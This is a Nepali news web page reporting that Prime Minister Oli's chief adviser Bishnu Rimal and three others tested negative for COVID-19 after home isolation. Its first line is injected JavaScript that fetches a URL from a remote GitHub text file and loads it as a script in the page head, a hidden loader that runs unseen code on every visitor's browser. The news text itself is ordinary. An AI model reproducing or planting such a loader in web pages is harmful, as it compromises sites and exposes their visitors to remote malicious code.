;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमालसहित ४ जनाको कोरोना रिपोर्ट नेगेटिभ – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमालसहित ४ जनाको कोरोना रिपोर्ट नेगेटिभ
समाचार

प्रधानमन्त्री ओलीका मुख्य सल्लाहकार रिमालसहित ४ जनाको कोरोना रिपोर्ट नेगेटिभ

आसोज २३,

काठमाडौं । प्रधानमन्त्री केपी शर्मा ओलीका मुख्य सल्लाहकार विष्णु रिमालसहितका ४ जनाको कोरोना भाइरस संक्रमणको रिपोर्टि नेगेटिभ आएको छ । उनीहरुलाई गत असोज १७ गते शनिबार कोरोना पुष्टि भएको थियो ।

बिहिबार गरिएको परीक्षणमा परराष्ट्र सल्लाहकार डा. राजन भट्टराई र प्रेस सल्लाहकार सूर्य थापाको कोरोना रिपोर्ट नेगेटिभ देखिएको प्रधानमन्त्रीका प्रेस सल्लाकार सूर्य थापाले जानकारी दिए ।

उनले आफूहरुले कोरोना जितेको बताएका छन् । साथै उनीहरु प्रति शुभेच्छा र सद्भावका निम्ति प्रकट गर्ने सबै महानुभावप्रति आभारी ब्यक्त गरेका छन् । उनीहरु होमआइसोलेसनमा बसेका थिए ।

फेसबुक प्रतिक्रियाहरु